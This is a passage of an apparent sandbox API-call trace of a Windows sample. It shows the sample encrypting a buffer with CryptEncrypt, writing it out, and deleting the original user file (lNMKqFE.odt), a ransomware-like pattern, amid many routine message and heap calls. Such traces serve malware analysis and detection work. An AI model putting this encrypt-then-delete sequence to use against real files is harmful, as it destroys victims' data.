lpMsg=0x8cf3b8) returned 0 [0122.939] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.939] CharLowerBuffW (in: lpsz="byte[22904]", cchLength=0xb | out: lpsz="byte[22904]") returned 0xb [0122.939] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.940] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.940] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.940] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.940] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.940] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.940] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.940] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0122.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa270, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0122.940] CryptEncrypt (in: hKey=0x9a47c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a95438*, pdwDataLen=0x8cef60*=0x5974, dwBufLen=0x5978 | out: pbData=0x2a95438*, pdwDataLen=0x8cef60*=0x5978) returned 1 [0122.941] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.941] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.941] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.941] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.941] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.941] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.941] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.941] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0122.941] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.942] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0122.942] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.942] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.942] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0122.942] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0122.942] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0122.942] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0122.942] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0122.942] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0122.942] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.942] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0122.942] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0122.942] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0122.942] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0122.942] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0122.942] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.942] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.942] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.944] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.944] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.945] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.945] WriteFile (in: hFile=0x4f0, lpBuffer=0x37d0050*, nNumberOfBytesToWrite=0x5978, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x37d0050*, lpNumberOfBytesWritten=0x8cf5e4*=0x5978, lpOverlapped=0x0) returned 1 [0122.946] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.946] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.946] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0122.946] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0122.946] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0122.946] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0122.947] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0122.947] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.947] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0122.947] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.947] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0122.947] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0122.947] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.947] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0122.947] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaa510, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0122.947] CryptDestroyKey (hKey=0x9a47c0) returned 1 [0122.947] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0122.947] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0122.947] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0122.947] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0122.947] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0122.947] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0122.947] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0122.947] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0122.947] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0122.947] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0122.947] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0122.947] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0122.947] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0122.947] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0122.948] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0122.948] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0122.948] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0122.948] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0122.948] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0122.948] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0122.948] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0122.948] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0122.948] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0122.948] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.948] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0122.948] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.948] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0122.948] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.948] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.948] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0122.948] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.948] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0122.948] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.948] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.948] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.948] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.948] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0122.948] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0122.948] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0122.949] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0122.949] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0122.949] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.949] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.949] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0122.949] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.949] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0122.949] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0122.949] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0122.949] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0122.949] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0122.949] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0122.949] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0122.949] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0122.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7000, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0122.949] CryptReleaseContext (hProv=0x9be890, dwFlags=0x0) returned 1 [0122.949] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.949] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.949] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0122.949] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.949] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0122.949] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0122.949] FreeLibrary (hLibModule=0x76390000) returned 1 [0122.950] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.950] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.950] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.950] CloseHandle (hObject=0x4f4) returned 1 [0122.951] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.951] CloseHandle (hObject=0x4f0) returned 1 [0122.952] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.953] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0122.953] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0122.953] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0122.953] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/lNMKqFE.odt", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\lNMKqFE.odt", lpFilePart=0x8cedf4*="lNMKqFE.odt") returned 0x2b [0122.953] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\lNMKqFE.odt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lnmkqfe.odt")) returned 0x20 [0122.953] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\lNMKqFE.odt", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68a94210, ftCreationTime.dwHighDateTime=0x1d5d3d7, ftLastAccessTime.dwLowDateTime=0x21380940, ftLastAccessTime.dwHighDateTime=0x1d5cc78, ftLastWriteTime.dwLowDateTime=0x21380940, ftLastWriteTime.dwHighDateTime=0x1d5cc78, nFileSizeHigh=0x0, nFileSizeLow=0x5974, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="lNMKqFE.odt", cAlternateFileName="")) returned 0x9a47c0 [0122.953] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\lNMKqFE.odt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lnmkqfe.odt")) returned 1 [0122.965] FindNextFileW (in: hFindFile=0x9a47c0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68a94210, ftCreationTime.dwHighDateTime=0x1d5d3d7, ftLastAccessTime.dwLowDateTime=0x21380940, ftLastAccessTime.dwHighDateTime=0x1d5cc78, ftLastWriteTime.dwLowDateTime=0x21380940, ftLastWriteTime.dwHighDateTime=0x1d5cc78, nFileSizeHigh=0x0, nFileSizeLow=0x5974, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="lNMKqFE.odt", cAlternateFileName="")) returned 0 [0122.965] FindClose (in: hFindFile=0x9a47c0 | out: hFindFile=0x9a47c0) returned 1 [0122.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0122.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0122.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0122.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0122.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0122.965] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0122.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0122.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0122.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0122.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0122.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0122.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0122.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0122.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0122.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0122.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0122.966] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0122.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0122.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0122.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9058 [0122.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0122.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0122.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa91c0 [0122.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0122.966] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0122.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 